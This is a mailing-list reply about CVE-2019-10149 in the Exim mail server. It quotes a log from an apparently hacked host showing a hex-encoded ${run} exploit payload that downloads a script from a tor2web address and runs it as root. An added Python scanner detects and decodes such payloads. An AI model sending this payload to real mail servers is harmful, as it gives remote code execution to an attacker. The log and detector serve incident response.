Re: [exim] CVE-2019-10149: already vulnerable ?

Author: Benoît PELISSIER
Date:  
To: exim-users
Subject: Re: [exim] CVE-2019-10149: already vulnerable ?
> The version is fine.
> But the question is, when did you install this version?


When Debian updated its repo

> Check your system for unusual activities.
> Symptoms on a hacked system I became aware of were quite similar. The log
> reported too many received headers:
>
> root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
> 2019-06-20 15:13:33 Received from <> H=(<zensored>.de) [89.248.171.57] P=smtp S=1114
> 2019-06-20 15:13:33 routing failed for root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@<zensored>.de: Too many "Received" headers - suspected mail loop
> *** Frozen (delivery error message)


I have this log entry too...

Benoît
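An added example, not part of the original message or of Exim itself: a small Python scanner that flags log lines like the one quoted above, where a recipient address carries a `${run{...}}` expansion, and decodes the `\xNN` escapes so the attempted command can be read during triage. The sample lines, addresses and the `scan` helper are constructed for illustration; the source-IP association assumes a per-message log such as `exim -Mvl` output.

```python
import re

# Recipient address carrying an Exim string expansion, as in
# "routing failed for root+${run{...}}@host" in the quoted log.
RUN_RE = re.compile(r"\$\{run\s*\{(?P<cmd>.*?)\}\}@(?P<domain>[^\s:]+)")
HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
HOST_RE = re.compile(r"\[(?P<ip>[0-9a-fA-F.:]+)\]")

# Constructed sample in the layout of `exim -Mvl` output (not real data).
SAMPLE = [
    r'2019-06-20 15:13:33 Received from <> H=(mail.example.net) [192.0.2.10] P=smtp S=1114',
    r'2019-06-20 15:13:33 routing failed for root+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22id\x22}}'
    r'@example.org: Too many "Received" headers - suspected mail loop',
    r'2019-06-20 15:14:02 Received from <alice@example.net> H=(mail.example.net) [192.0.2.11] P=smtp S=900',
]


def scan(lines):
    """Return one finding per log line whose recipient contains ${run{...}}."""
    findings, last_ip = [], None
    for line in lines:
        host = HOST_RE.search(line)
        if "Received from" in line and host:
            # Remember the most recent sending host seen in this log.
            last_ip = host.group("ip")
        match = RUN_RE.search(line)
        if match:
            # Turn \xNN escapes back into characters for the analyst.
            decoded = HEX_RE.sub(lambda h: chr(int(h.group(1), 16)),
                                 match.group("cmd"))
            findings.append({
                "timestamp": line[:19],
                "source_ip": last_ip,
                "domain": match.group("domain"),
                "command": decoded,
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A hit means the exploit was attempted against the host; whether the command actually ran depends on the Exim version that was installed at that timestamp.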